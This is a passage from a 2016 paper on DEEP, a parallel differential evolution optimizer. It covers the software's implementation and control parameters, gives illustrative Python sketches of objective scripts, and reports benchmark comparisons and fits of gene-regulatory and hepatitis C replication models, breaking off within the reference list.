DEEP can be effectively parallelized due to the independent evaluation of each population member. Various models for the parallelization of evolutionary algorithms have been developed, such as master-slave, island, cellular or hybrid versions (Tasoulis et al., 2004). The approach implemented in DEEP (see the Algorithm 4 insertion) utilizes the multicore architecture of modern CPUs and employs a pool of worker threads with an asynchronous queue of tasks to evaluate the individual solutions in parallel. The calculation of the objective function for each trial vector, using the command supplied by the user, is pushed to the asynchronous queue and starts as soon as there is an available thread in the pool. Such an approach is similar to the "guided" schedule in OpenMP but gives us more flexibility and control. The command output is automatically recognized according to the specified format. All threads started in the current iteration are to be finished before the next one starts.

IMPLEMENTATION

DEEP is implemented in the C programming language as a console application and employs interfaces from the GLIB project (https://developer.gnome.org/glib/), e.g., the Thread Pool API. The architecture allows a user to utilize any programming language or computer system, such as R, Octave or Python, to implement both the mathematical model and the comparison of the solution with experimental data.

Control parameters

All the control parameters are specified in a single input file as key-value pairs in INI format supplied to the DEEP executable on the command line. The control parameters are arranged into three groups described below.

The Mathematical Model section specifies the number of parameters, the lower and upper parameter bounds, as well as the software necessary to run a model. A possibility is provided to indicate parameters that are to be kept unchanged.

The Objective Function section defines the aggregation methods for constraints and multiple objectives. The type of function, i.e., main or additional objective, equality or inequality constraint, is denoted by a special keyword. Ranks and weights are to be given here.

The Method Settings section allows the user to tune the settings, namely, the population size, the stopping criterion, the offspring generation strategy, the number of the oldest individuals to be substituted in the next generation Ψ, the maximal number of working threads and the seed for the random number generator. Two options for offspring generation are provided, namely the selection of the best individual or "trigonometric mutation." The stopping criterion can limit the convergence rate, the absolute or relative value of the objective function, the number of generations or the wall clock time. The initial population is by default generated randomly within the limits given; however, it is also possible to define one initial guess and generate the individuals in a specified vicinity of it.

Programming interfaces

The DEEP method can be used as a static or dynamic shared object and embedded in another software package. Application programming interfaces (APIs) can be used to connect with existing code implementing the mathematical model and objective function. This approach is often preferred in academic and industrial applications where the high-level modeling system language is not sufficient or the computation time should be reduced.
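As an illustration of this external-program convention, the sketch below shows what a minimal user-side model/objective script could look like. It is hypothetical rather than shipped with DEEP: the parameter-file layout, the output delimiter, the toy model and the INI keys quoted in the comments are assumptions, and the authoritative names and formats are those defined in DEEP's documentation and configuration file.

```python
#!/usr/bin/env python3
# Sketch of a user-side objective program of the kind DEEP can call.  The
# layout assumed here -- whitespace-separated parameters in, one line of
# criterion values out -- is only an illustration of the convention described
# above, not DEEP's fixed format.
#
# A hypothetical fragment of the INI-style control file might look like:
#   [method]
#   population_size = 200
#   max_generations = 1499
#   threads = 4
# (the actual key names are defined by DEEP's documentation, not here).
import sys
import numpy as np

def main():
    params = np.loadtxt(sys.argv[1]).ravel()        # parameters written by DEEP
    t = np.linspace(0.0, 5.0, 20)
    data = 2.0 * np.exp(-0.7 * t)                   # stand-in "experimental" data
    model = params[0] * np.exp(-params[1] * t)
    rss = float(np.sum((model - data) ** 2))        # main objective F
    box_violation = float(np.sum(np.clip(-params, 0.0, None)))  # g(q) <= 0 example
    # One value per criterion, separated by the configured delimiter (spaces here).
    print(rss, box_violation)

if __name__ == "__main__":
    main()
```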
RESULTS

Method testing on benchmark functions

To evaluate the performance of DEEP we used three simple multimodal test functions of dimension $D = 30$ from the Competition on Real Parameter Single Objective Optimization 2014 (CEC-2014) test suite (Liang, Qu & Suganthan, 2014), namely:

Shifted and Rotated Griewank's Function:
$H(x) = h\left( M\left( \frac{600(x - o_H)}{100} \right) \right) + 700; \quad h(x) = \sum_{i=1}^{D} \frac{x_i^2}{4000} - \prod_{i=1}^{D} \cos\left( \frac{x_i}{\sqrt{i}} \right) + 1$

Shifted Rastrigin's Function:
$R(x) = r\left( \frac{5.12(x - o_r)}{100} \right) + 800; \quad r(x) = \sum_{i=1}^{D} \left( x_i^2 - 10\cos(2\pi x_i) + 10 \right)$

Shifted Schwefel's Function:
$S(x) = s\left( \frac{1000(x - o_s)}{100} \right) + 1000; \quad s(x) = 418.9829 \times D - \sum_{i=1}^{D} g(z_i(x_i))$, where $z_i = x_i + 4.209687462275036 \times 10^2$, and

$g(z_i) = \begin{cases} z_i \sin(|z_i|^{1/2}), & |z_i| < 500, \\ \left(500 - \operatorname{mod}(z_i, 500)\right) \sin\left( \sqrt{|500 - \operatorname{mod}(z_i, 500)|} \right) - \dfrac{(z_i - 500)^2}{1000\,D}, & z_i > 500, \\ \left(\operatorname{mod}(|z_i|, 500) - 500\right) \sin\left( \sqrt{|\operatorname{mod}(|z_i|, 500) - 500|} \right) - \dfrac{(z_i + 500)^2}{1000\,D}, & z_i < -500, \end{cases}$

and the global optimum is shifted to $o_i = [o_{i1}, o_{i2}, \ldots, o_{iD}]^T$ and rotated using the rotation matrix $M_i$.

For each function 51 runs were performed with identical settings and with a random initial population. The maximal allowed number of functional evaluations was set to $3 \times 10^5$. Other DEEP settings were $NP = 200$, $G_{max} = 1{,}499$ and $\Psi = 40$. The measured error was the difference between the known optimal value and the obtained solution. Following the methodology described in Tanabe & Fukunaga (2014), we used the Wilcoxon rank-sum test with significance level p < 0.05 to compare the evaluation results for 51 runs with the results of the top three methods from CEC-2014 (Liang, Qu & Suganthan, 2014) taken from the CEC-2014 report:
1. Covariance Matrix Learning and Searching Preference (CMLP) (Chen et al., 2014),
2. Success-History Based Parameter Adaptation for Differential Evolution (L-SHADE) (Tanabe & Fukunaga, 2014),
3. United Multi-Operator Evolutionary Algorithms (UMOEAs) (Elsayed et al., 2014).

The number of benchmark functions, out of the three tested, on which DEEP performed better (+), worse (−), or not significantly different (≈) is presented in Table 1. DEEP demonstrated the same or better performance.

Table 1. The results of the statistical comparison of DEEP with the top three methods from CEC-2014 on 3 functions. The symbols +, −, ≈ indicate that DEEP performed significantly better (+), significantly worse (−), or not significantly different (≈) compared to another algorithm using the Wilcoxon rank-sum test (p < 0.05). All results are based on 51 runs.

DEEP vs        CMLP    L-SHADE    UMOEAs
− (worse)       0         0          0
≈ (no sig.)     3         3          1
+ (better)      0         0          2

The method test on a reduced model of gene regulation

To demonstrate how DEEP works in applications, we developed a realistic benchmark problem based on a real biological model of the gap gene regulatory network (Kozlov et al., 2015b). The model provides a dynamical description of the gap gene regulatory system, using detailed DNA-based information, as well as spatial TF concentration data at varying time points. The gap gene regulatory network controls segment determination in the early Drosophila embryo (Akam, 1987; Jaeger, 2011; Surkova et al., 2008). The state variables of this model are the concentrations of mRNAs and proteins encoded by the four gap genes hb, Kr, gt, and kni.
The model implements the thermodynamic approach in the form proposed in He et al. (2010) to calculate the expression of a target gene at the RNA level. This level is proportional to the gene activation level, also called the promoter occupancy, and is determined by the concentrations of eight transcription factors Hb, Kr, Gt, Kni, Bcd, Tll, Cad and Hkb:

$E^a_i(t) = \frac{Z^a_{ON,i}(t)}{Z^a_{ON,i}(t) + Z^a_{OFF,i}(t)}$   (7)

where $Z^a_{ON,i}(t)$ and $Z^a_{OFF,i}(t)$ are the statistical weights of the enhancer with the basal transcriptional complex bound and unbound, respectively. Two sets of reaction–diffusion differential equations for the mRNA $u^a_i(t)$ and protein $v^a_i(t)$ concentrations describe the dynamics of the system (Reinitz & Sharp, 1995; Jaeger et al., 2004; Kozlov et al., 2012):

$du^a_i/dt = R^a_u E^a_i(t) + D^a_u(n)\left[ (u^a_{i-1} - u^a_i) + (u^a_{i+1} - u^a_i) \right] - \lambda^a_u u^a_i,$   (8)

$dv^a_i/dt = R^a_v u^a_i(t - \tau^a_v) + D^a_v(n)\left[ (v^a_{i-1} - v^a_i) + (v^a_{i+1} - v^a_i) \right] - \lambda^a_v v^a_i,$   (9)

where $n$ is the cleavage cycle number, $R^a_v$ and $R^a_u$ are the maximum synthesis rates, $D^a_v$ and $D^a_u$ (to smooth the resulting model output) are the diffusion coefficients, and $\lambda^a_v$ and $\lambda^a_u$ are the decay rates for the protein and mRNA of gene $a$. The model spans the time period of cleavage cycles 13 and 14A (c13 and c14, resp.) and the interval of the A-P axis from 35% to 92% (58 nuclei) of embryo length. The number of nuclei along the A-P axis is doubled when going from c13 to c14. The model is fitted to data on gap protein concentrations from the FlyEx database (Pisarev et al., 2008) and mRNA concentrations from SuperFly (Cicin-Sain et al., 2015).

To fit the model we used the residual sum of squared differences between the model output and data, and we used the weighted Pattern Generation Potential proposed in Samee & Sinha (2013) as the second objective function:

$RSS(x,y) = \sum_{\forall g,n,t:\, \exists y^g_n(t)} \left( x^g_n(t) - y^g_n(t) \right)^2 \qquad wPGP(x,y) = \frac{1 + \left( \mathrm{penalty}(x,y) - \mathrm{reward}(x,y) \right)}{2}$

where $g$, $n$ and $t$ are gene, nucleus and time point, respectively, and

$\mathrm{reward}(x,y) = \frac{\sum_i y_i \ast \min(y_i, x_i)}{\sum_i y_i \ast y_i} \qquad \mathrm{penalty}(x,y) = \frac{\sum_i (y_{max} - y_i) \ast \max(x_i - y_i, 0)}{\sum_i (y_{max} - y_i) \ast (y_{max} - y_i)}$

where $x_i$ and $y_i$ are respectively the predicted and experimentally observed expression in nucleus $i$, and $y_{max}$ is the maximum level of experimentally observed expression. Consequently, the combined objective function is defined by:

$F(q,Y) = 2 \times 10^{-7} \ast RSS(v(q),V) + 1.5 \times 10^{-7} \ast RSS(u(q),U) + wPGP(v(q),V) + 0.6 \ast wPGP(u(q),U) + 10^{-8} \ast \mathrm{Penalty}(q),$   (10)

where $Y = \{V, U\}$ contains the data for $u$ and $v$, the function $\mathrm{Penalty}$ limits the growth of regulatory parameters, and the weights were obtained experimentally.

We simplified the original computationally expensive model (Kozlov et al., 2015b) to use it as a benchmark in our calculations as follows. Firstly, we reduced the number of nuclei from 58 to 10 and considered only one target gene with the DNA sequence from kni. Consequently, the number of parameters was reduced to 34, two of which are of integer type. Biologically feasible box constraints in the form (4) are imposed for 28 parameters. Next, we fitted this reduced model to the coarsened data and used the obtained solution and model parameters as the synthetic data for the benchmark. Thus, the exact parameters of the benchmark optimization problem are known. To compare DEEP and MEIGOR (Egea et al., 2014) we ran both methods in the same conditions and recorded the final value of the objective function (10), the final parameters and the number of functional evaluations.
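For concreteness, the following NumPy sketch spells out these fitting criteria as they are written above. It is an illustration rather than the DEEP or model code: the NaN-based handling of missing data points, the random example profiles, and the normalization of the penalty term by the sum of squared (y_max − y_i) weights (chosen to mirror the reward term) are assumptions.

```python
# A small NumPy sketch of the fitting criteria used above (RSS, reward, penalty,
# wPGP and the combined objective of Eq. (10)).  Example inputs are assumptions.
import numpy as np

def rss(x, y):
    # Residual sum of squares over points where data exist (NaN marks no data).
    mask = ~np.isnan(y)
    return float(np.sum((x[mask] - y[mask]) ** 2))

def wpgp(x, y):
    y_max = np.nanmax(y)
    reward = np.nansum(y * np.minimum(y, x)) / np.nansum(y * y)
    penalty = (np.nansum((y_max - y) * np.maximum(x - y, 0.0))
               / np.nansum((y_max - y) * (y_max - y)))
    return (1.0 + penalty - reward) / 2.0

def combined_objective(v_model, V, u_model, U, regulatory_penalty):
    # Eq. (10) with the experimentally chosen weights quoted in the text.
    return (2e-7 * rss(v_model, V) + 1.5e-7 * rss(u_model, U)
            + wpgp(v_model, V) + 0.6 * wpgp(u_model, U)
            + 1e-8 * regulatory_penalty)

if __name__ == "__main__":
    rng = np.random.default_rng(1)
    V = np.abs(rng.normal(100, 30, size=58))     # protein "data" (illustrative)
    v_model = V + rng.normal(0, 5, size=58)      # model output (illustrative)
    U = np.abs(rng.normal(80, 20, size=58))
    u_model = U + rng.normal(0, 5, size=58)
    print(combined_objective(v_model, V, u_model, U, regulatory_penalty=0.0))
```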
We considered those solutions for which the final functional value is less than 0.005 that corresponds to parameters close to exact known values. The Welch two sample t-test demonstrated that DEEP used less objective function evaluations than MEIGOR with p<0.005 (see Fig. 1). Real applications DEEP software was successfully applied to explain the dramatic decrease in gap gene expression in early Drosophila embryo caused by a null mutation in Kr gene. Figure 2A Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 12/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.74 Figure 1 Comparison of number of objective function evaluations for DEEP and MEIGOR on reduced model of gene regulation. DEEP used less objective function evaluations than MEIGOR with p < 0.005 according to Welch two sample t-test. presents the topology of regulatory network inferred by fitting the dynamical model with 44 parameters of gap gene expression to the wild type and Kr mutant data simultaneously (Kozlov et al., 2012). Other DEEP applications include different problems described in Ivanisenko et al. (2014); Nuriddinov et al. (2013). Recently, DEEP was used in the online ancestry prediction tool reAdmix that can identify the biogeographic origins of highly mixed individuals (Kozlov et al., 2015a). reAdmix is available at http://chcb.saban-chla.usc.edu/reAdmix/. Two applications are discussed below in details. Subgenomic Hepatitis C virus replicon replication model The hepatitis C virus (HCV) causes hazardous liver diseases leading frequently to cirrhosis and hepatocellular carcinoma. No effective anti-HCV therapy is available up to date. Design of the effective anti-HCV medicine is a challenging task due to the ability of the hepatitis C virus to rapidly acquire drug resistance. The cells containing HCV subgenomic replicon are widely used for experimental studies of the HCV genome replication mechanisms and the in vitro testing of the tentative medicine. HCV NS3/4A protease is essential for viral replication and therefore it has been one of the most attractive targets for development of specific antiviral agents for HCV. We used the new algorithm and software package to determine 18 parameters (kinetic reaction constants) of the mathematical model of the subgenomic Hepatitis C virus Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 13/20 https://peerj.com http://chcb.saban-chla.usc.edu/reAdmix/ http://dx.doi.org/10.7717/peerj-cs.74 Figure 2 Gene regulatory network, arrows and T-ended curves indicate activation and repressive inter- actions respectively, dotted lines show interactions present in wild type only (A). Regulatory weights of in- dividual transcription factor binding sites (B). Evolution of three objective functions during parameter fit- ting (C). See text for details. (HCV) replicon replication in Huh-7 cells in the presence of the HCV NS3 protease inhibitor, see Ivanisenko et al. (2013). The experimental data include kinetic curves of the viral RNA suppression at various inhibitor concentrations of the VX-950 and BILN-2061 inhibitors (Lin et al., 2004; Lin et al., 2006). We seek for the set of parameters that minimizes three criteria. The main criterion (RSS) is the residual sum of squared differences between the model output and data. Additional criteria 2 (F2) and 3 (F3) penalize the deviation of the time to steady state and the number of viral vesicles at the steady state, respectively. 
The combined criterion was defined as follows: Fcombined=RSS+0.1·F2+0.1·F3 (11) where the weights were obtained experimentally. The dependence of the best value of the combined criterion (11) in population of individuals on the generation number for 10 runs is plotted in Fig. 3A. The objective function is to be evaluated once for each member of the generation, the size of which was set to 200. The plot of the criteria in the close vicinity of the optimal values of the two parameters from the set is shown in Figs. 3B and 3C. Despite of the fact that the criteria do not take a minimal values in one and the same point, the algorithm produces reliable approximation of the optimum. The comparison of the model output and experimental dependencies of the viral RNA suppression rate on inhibitor concentration is shown in Figs. 3D and 3E. It is worth to note that, the model correctly reproduces experimental kinetics of the viral RNA suppression. The predictive power of the model was estimated using the experimental data on dependencies of the viral RNA suppression rate on the increasing concentration of the SCH-503034 (Malcolm et al., 2006) and ITMN-191 (Seiwert et al., 2008) inhibitors. These Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 14/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.74 Figure 3 (A) The combined criterion (11) vs. the generation number for 10 runs. 200 function eval- uations were performed by the minimization procedure for each generation. (B, C) The criteria graphs are shown in the close vicinity of the optimal values of the four parameters. The values of the parameters found by the algorithm are denoted as x and y. (D, E) The viral RNA suppression in the presence of the NS3 protease inhibitors in different concentrations. The dependence of the viral RNA suppression on the increasing concentration of BILN-2061 (D) and VX-950 (E) inhibitors is shown for the third day post- treatment. A solid line is used to show model output and points correspond to the experimental data (Lin et al., 2004; Lin et al., 2006). (F, G) The predicted kinetics and the suppression rate of the viral RNA in comparison with data not used for parameter estimation. The dependencies of the suppression rate of the viral RNA on the increasing concentration of the SCH-503034 (F) and ITMN-2061 (G) inhibitors (Mal- colm et al., 2006; Seiwert et al., 2008). data were not used for parameter estimation. As it can be seen in Figs. 3F and 3G, the model correctly reproduces experimental observations and thus can be used for in silico studies. Sequence-based model of the gap gene regulatory network Recently, DEEP method was successfully applied to recover 68 parameters of the DNA sequence-based model (7)–(8) of regulatory network of 4 gap genes—hb, Kr, gt, and kni— and 8 transcription factors: Hb, Kr, Gt, Kni, Bcd, Tll, Cad and Hkb (Kozlov et al., 2015b). The trained model provides a tool to estimate the importance of each TF binding site for the model output (see Fig. 2B). We showed that functionally important sites are not exclusively located in cis-regulatory elements and that sites with low regulatory weight are important for the model output (Kozlov et al., 2014). The evolution of the three objective functions during one optimization run is shown in Fig. 2C. Note that the wPGP and the Penalty functions do not decline monotonically and simultaneously. 
In a few first steps these functions reach their maximal values while RSS falls sharply, that corresponds to the adaptation of the control parameters of the algorithm and substitution of old parameter sets with good ones. Then wPGP starts to decay, and Penalty fluctuates at high level, while RSS decays approximately at the same rate as wPGP. As Penalty depends only on regulatory parameters, its behaviour at this stage illustrates that it disallows the process to be trapped in some local minimum with extreme values of parameters. During the second half of the optimization process, Penalty Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 15/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.74 reaches its final low level and stays at it almost constant till convergence while the RSS and wPGP exhibit a modest growth and then converge. This illustrates the ability of DEEP to balance several objective functions. The model output at this stage is not changed much as indicated by RSS though the absolute values of regulatory parameters are fine tuned. CONCLUSIONS The parallelization of objective function calculation implemented in DEEP method considerably reduces the computational time. Several members of the current generation are evaluated in parallel, which in our experience with Sequence-based Model of the Gap Gene Regulatory Network, resulted in 24 times speedup on 24 core computational node (Intel Xeon 5670, Joint Supercomputer Center of the Russian Academy of Sciences, Moscow). The calculation of 24 objective functions in parallel threads took approximately the same 20 s as one sequential job, and the optimization runs were able to converge in 14 h after approximately 60,000 functional evaluations. To sum up, we elaborated both the method and the software, which demonstrated high performance on test functions and biological problems of finding parameters in dynamic models of biological processes by minimizing one or even several objective functions that measure the deviation of model solution from data. ACKNOWLEDGEMENTS We are thankful to the Joint Supercomputer Center of the Russian Academy of Sciences, Moscow, for provided computational resources. ADDITIONAL INFORMATION AND DECLARATIONS Funding The implementation and testing was supported by RSF grant no. 14-14-00302, the method development was supported by RFBR grant 14-01-00334 and the Programme ‘‘5-100-2020’’ by the Russian Ministry of Science and Education. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: RSF: 14-14-00302. RFBR: 14-01-00334. Russian Ministry of Science and Education: 5-100-2020. Competing Interests The authors declare there are no competing interests. Author Contributions • Konstantin Kozlov conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 16/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.74 • Alexander M. Samsonov conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. • Maria Samsonova conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. 
Data Availability The following information was supplied regarding data availability: SourceForge: http://deepmethod.sourceforge.net/ openSUSE: https://build.opensuse.org/project/repositories/home:mackoel:compbio. REFERENCES Akam M. 1987. The molecular basis for metameric pattern in the Drosophila embryo. Development 101:1–22. Chen L, Liu H-L, Zheng Z, Xie S. 2014. A evolutionary algorithm based on covariance matrix learning and searching preference for solving CEC 2014 benchmark prob- lems. In: CEC 2014 special session and competition on single objective real-parameter numerical optimization, vol. 3. Piscataway: IEEE, 2672–2677. Chu KW, Deng Y, Reinitz J. 1999. Parallel simulated annealing by mixing of states. The Journal of Computational Physics 148:646–662 DOI 10.1006/jcph.1998.6134. Cicin-Sain D, Pulido AH, Crombach A, Wotton KR, Jiménez-Guri E, Taly J-F, Roma G, Jaeger J. 2015. SuperFly: a comparative database for quantified spatio- temporal gene expression patterns in early dipteran embryos. Nucleic Acids Research 43(D1):D751–D755 DOI 10.1093/nar/gku1142. Egea JA, Henriques D, Cokelaer T, Villaverde AF, MacNamara A, Danciu D-P, Banga JR, Saez-Rodriguez J. 2014. MEIGO: an open-source software suite based on metaheuristics for global optimization in systems biology and bioinformatics. BMC Bioinformatics 15(1):1–9 DOI 10.1186/1471-2105-15-1. Egea JA, Martí R, Banga JR. 2010. An evolutionary method for complex-process optimization. Computers & Operations Research 37(2):315–324 DOI 10.1016/j.cor.2009.05.003. Elsayed SM, Sarker RA, Essam DL, Hamza NM. 2014. Testing united multi-operator evolutionary algorithms on the CEC-2014 real-parameter numerical optimization. In: CEC 2014 special session and competition on single objective real-parameter numerical optimization, vol. 3. Piscataway: IEEE, 1650–1657. Fan H-Y, Lampinen J. 2003. A trigonometric mutation operation to differential evolu- tion. Journal of Global Optimization 27:105–129 DOI 10.1023/A:1024653025686. Fomekong-Nanfack Y. 2009. Genetic Regulatory Networks Inference: modeling, parameters estimation and model validation. PhD Thesis, University of Amsterdam. Fomekong-Nanfack Y, Kaandorp J, Blom J. 2007. Efficient parameter estimation for spatio-temporal models of pattern formation: case study of Drosophila melanogaster. Bioinformatics 23(24):3356–3363 DOI 10.1093/bioinformatics/btm433. Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 17/20 https://peerj.com http://deepmethod.sourceforge.net/ https://build.opensuse.org/project/repositories/home:mackoel:compbio http://dx.doi.org/10.1006/jcph.1998.6134 http://dx.doi.org/10.1093/nar/gku1142 http://dx.doi.org/10.1186/1471-2105-15-1 http://dx.doi.org/10.1016/j.cor.2009.05.003 http://dx.doi.org/10.1023/A:1024653025686 http://dx.doi.org/10.1093/bioinformatics/btm433 http://dx.doi.org/10.7717/peerj-cs.74 Gaemperle R, Mueller SD, Koumoutsakos P. 2002. A parameter study for differential evolution. In: Grmela A, Mastorakis NE, eds. Advances in intelligent systems, fuzzy systems, evolutionary computation. WSEAS Press, 293–298. He X, Samee MAH, Blatti C, Sinha S. 2010. Thermodynamics-based models of tran- scriptional regulation by enhancers: the roles of synergistic activation, cooperative binding and short-range repression. PLoS Computational Biology 6(9):e1000935 DOI 10.1371/journal.pcbi.1000935. Ivanisenko N, Mishchenko E, Akberdin I, Demenkov P, Likhoshvai V, Kozlov K, Todorov D, Samsonova M, Samsonov A, Kolchanov N, Ivanisenko V. 2013. 
Replication of the Subgenomic Hepatitis C virus replicon in the presence of the NS3 protease inhibitors: a stochastic model. Biophysics 58(5):592–606 DOI 10.1134/S0006350913050059. Ivanisenko NV, Mishchenko EL, Akberdin IR, Demenkov PS, Likhoshvai VA, Kozlov KN, Todorov DI, Gursky VV, Samsonova MG, Samsonov AM, Clausznitzer D, Kaderali L, Kolchanov NA, Ivanisenko VA. 2014. A new stochastic model for Subgenomic Hepatitis C virus replication considers drug resistant mutants. PLoS ONE 9(3):e91502 DOI 10.1371/journal.pone.0091502. Jaeger J. 2011. The gap gene network. Cellular and Molecular Life Sciences 68:243–274 DOI 10.1007/s00018-010-0536-y. Jaeger J, Surkova S, Blagov M, Janssens H, Kosman D, Kozlov KN, Manu, Myasnikova E, Vanario-Alonso CE, Samsonova M, Sharp DH, Reinitz J. 2004. Dynamic control of positional information in the early Drosophila embryo. Nature 430:368–371 DOI 10.1038/nature02678. Kozlov K, Chebotarev D, Hassan M, Triska M, Triska P, Flegontov P, Tatarinova T. 2015a. Differential evolution approach to detect recent admixture. BMC Genomics 16(Suppl 8):Article S9 DOI 10.1101/015446. Kozlov K, Gursky VV, Kulakovskiy IV, Dymova A, Samsonova M. 2015b. Analysis of functional importance of binding sites in the drosophila gap gene network model. BMC Genomics 16(13):1–16 DOI 10.1186/1471-2164-16-S13-S7. Kozlov K, Gursky V, Kulakovskiy I, Samsonova M. 2014. Sequence-based model of gap gene regulatory network. BMC Genomics 15(Suppl 12):Article S6. Kozlov K, Ivanisenko N, Ivanisenko V, Kolchanov N, Samsonova M, Samsonov AM. 2013. Enhanced differential evolution entirely parallel method for biomedical applications. In: Malyshkin V, ed. Lecture notes in computer science, vol. 7979. New York: Springer, 409–416. Kozlov K, Samsonov A. 2011. DEEP—differential evolution entirely parallel method for gene regulatory networks. Journal of Supercomputing 57:172–178 DOI 10.1007/s11227-010-0390-6. Kozlov K, Surkova S, Myasnikova E, Reinitz J, Samsonova M. 2012. Modeling of gap gene expression in Drosophila Kruppel mutants. PLoS Computational Biology 8(8):e1002635 DOI 10.1371/journal.pcbi.1002635. Liang JJ, Qu BY, Suganthan PN. 2014. Problem definitions and evaluation criteria for the CEC 2014 special session and competition on single objective real-parameter Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 18/20 https://peerj.com http://dx.doi.org/10.1371/journal.pcbi.1000935 http://dx.doi.org/10.1134/S0006350913050059 http://dx.doi.org/10.1371/journal.pone.0091502 http://dx.doi.org/10.1007/s00018-010-0536-y http://dx.doi.org/10.1038/nature02678 http://dx.doi.org/10.1101/015446 http://dx.doi.org/10.1186/1471-2164-16-S13-S7 http://dx.doi.org/10.1007/s11227-010-0390-6 http://dx.doi.org/10.1371/journal.pcbi.1002635 http://dx.doi.org/10.7717/peerj-cs.74 numerical optimization. Technical Report 201311. Singapore: Computational Intelligence Laboratory, Zhengzhou University, Zhengzhou China And Technical Report, Nanyang Technological University. Lin C, Lin K, Luong YP, Rao BG, Wei YY, Brennan DL, Fulghum JR, Hsiao HM, Ma S, Maxwell JP, Cottrell KM, Perni RB, Gates CA, Kwong AD. 2004. In vitro resistance studies of hepatitis C virus serine protease inhibitors, VX-950 and BILN 2061: structural analysis indicates different resistance mechanisms. Journal of Biological Chemistry 279(17):17508–17514 DOI 10.1074/jbc.M313020200. Lin K, Perni RB, Kwong AD, Lin C. 2006. VX-950, a novel hepatitis C virus (HCV) NS3- 4A protease inhibitor, exhibits potent antiviral activities in HCv replicon cells. 
An- timicrobial Agents and Chemotherapy 50(5):1813–1822 DOI 10.1128/AAC.50.5.1813-1822.2006. Malcolm BA, Liu R, Lahser F, Agrawal S, Belanger B, Butkiewicz N, Chase R, Gheyas F, Hart A, Hesk D, Ingravallo P, Jiang C, Kong R, Lu J, Pichardo J, Prongay A, Skelton A, Tong X, Venkatraman S, Xia E, Girijavallabhan V, Njoroge FG. 2006. SCH 503034, a mechanism-based inhibitor of hepatitis C virus NS3 protease, suppresses polyprotein maturation and enhances the antiviral activity of alpha in- terferon in replicon cells. Antimicrobial Agents and Chemotherapy 50(3):1013–1020 DOI 10.1128/AAC.50.3.1013-1020.2006. Mendes P, Kell DB. 1998. Non-linear optimization of biochemical pathways: applica- tions to metabolic engineering and parameter estimation. Bioinformatics 14:869–883 DOI 10.1093/bioinformatics/14.10.869. Moles CG, Mendes P, Banga JR. 2003. Parameter estimation in biochemical pathways: comparison of global optimization methods. Genome Research 13:2467–2474 DOI 10.1101/gr.1262503. Nuriddinov M, Kazantsev F, Rozanov A, Kozlov K, Peltek S, Akberdin I, Kolchanov N. 2013. Mathematical modeling of ethanol and lactic acid biosynthesis by theromphilic geobacillus bacteria. Russian Journal of Genetics: Applied Research 17(4/1):686–704. Pisarev A, Poustelnikova E, Samsonova M, Reinitz J. 2008. FlyEx, the quantitative atlas on segmentation gene expression at cellular resolution. Nucleic Acids Research 37:D560–D566 DOI 10.1093/nar/gkn717. Reinitz J, Sharp DH. 1995. Mechanism of eve stripe formation. Mechanisms of Develop- ment 49:133–158 DOI 10.1016/0925-4773(94)00310-J. Samee MAH, Sinha S. 2013. Evaluating thermodynamic models of enhancer activity on cellular resolution gene expression data. Methods 62:79–90 DOI 10.1016/j.ymeth.2013.03.005. Seiwert SD, Andrews SW, Jiang Y, Serebryany V, Tan H, Kossen K, Rajagopalan RPT, Misialek S, Stevens SK, Stoycheva A, Hong J, Lim SR, Qin X, Rieger R, Condroski KR, Zhang H, Do MG, Lemieux C, Hingorani GP, Hartley DP, Josey JA, Pan L, Beigelman L, Blatt LM. 2008. Preclinical characteristics of the HCV NS3/4A protease inhibitor ITMN-191 (R7227). Antimicrobial Agents and Chemotherapy 52(12):4432–4441 DOI 10.1128/AAC.00699-08. Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 19/20 https://peerj.com http://dx.doi.org/10.1074/jbc.M313020200 http://dx.doi.org/10.1128/AAC.50.5.1813-1822.2006 http://dx.doi.org/10.1128/AAC.50.3.1013-1020.2006 http://dx.doi.org/10.1093/bioinformatics/14.10.869 http://dx.doi.org/10.1101/gr.1262503 http://dx.doi.org/10.1093/nar/gkn717 http://dx.doi.org/10.1016/0925-4773(94)00310-J http://dx.doi.org/10.1016/j.ymeth.2013.03.005 http://dx.doi.org/10.1128/AAC.00699-08 http://dx.doi.org/10.7717/peerj-cs.74 Spirov AV, Kazansky AB. 2002. Jumping genes-mutators can raise efficacy of evolu- tionary search. In: Proceedings of the genetic and evolutionary computation conference GECCO2002. San Francisco: Morgan Kaufmann Publishers Inc. Storn R, Price K. 1995. Differential evolution—a simple and efficient heuristic for global optimization over continuous spaces. Technical Report TR-95-012. Berkeley: ICSI. Suleimenov Y. 2013. Global parameter estimation for thermodynamic models of transcriptional regulation. Methods 62:99–108 DOI 10.1016/j.ymeth.2013.05.012. Surkova S, Kosman D, Kozlov K, Manu, Myasnikova E, Samsonova A, Spirov A, Vanario-Alonso CE, Samsonova M, Reinitz J. 2008. Characterization of the Drosophila segment determination morphome. Developmental Biology 313(2):844–862 DOI 10.1016/j.ydbio.2007.10.037. Tanabe R, Fukunaga AS. 2014. 
